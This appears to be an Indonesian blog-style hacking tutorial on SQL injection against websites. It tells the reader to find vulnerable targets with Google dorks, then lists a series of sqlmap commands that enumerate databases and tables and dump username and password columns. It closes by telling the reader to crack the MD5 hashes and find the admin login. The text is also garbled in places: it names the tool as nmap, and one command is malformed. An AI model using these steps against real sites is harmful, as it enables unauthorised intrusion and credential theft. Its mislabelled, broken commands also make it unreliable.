nmap adalah suatu tool yg di pakai oleh para hackher untuk melakukan injeck terhadap suatu web
tanpa panjang lebar kita langsung aja ke TKP
1.cari target
2.langkah pertama yg harus kita lakukan adalah mencari bug's (kesalahan/syntax error) dalam sebuah web atau bisa minta bantuan embah google dengan memakai dork google
3.buka aplication menu > backtrack > vulnerability assessment > web aplication assessment > web vulnerability scanner > sqlmap
root@bt:/pentest/web/scanners/sqlmap# ./sqlmap.py -u "http://www.target.com" --random-agent --threads 10 --banner
root@bt:/pentest/web/scanners/sqlmap# ./sqlmap.py -u "http://www.target.com" --random-agent --threads 10 --current-user --current-db
root@bt:/pentest/web/scanners/sqlmap# ./sqlmap.py -u "http://www.target.com" --random-agent --threads 10 --dbs
root@bt:/pentest/web/scanners/sqlmap# ./sqlmap.py -u "http://www.target.com" --random-agent --threads 10 -D portal --tables
root@bt:/pentest/web/scanners/sqlmap# ./sqlmap.py -u "http://www.target.com" --random-agent --threads 10 -D portal -T user colomns
root@bt:/pentest/web/scanners/sqlmap# ./sqlmap.py -u "http://www.target.com" --random-agent --threads 10 -D portal -T user -C username,password --dump
tinggal crack deh password md5 dan cari admin login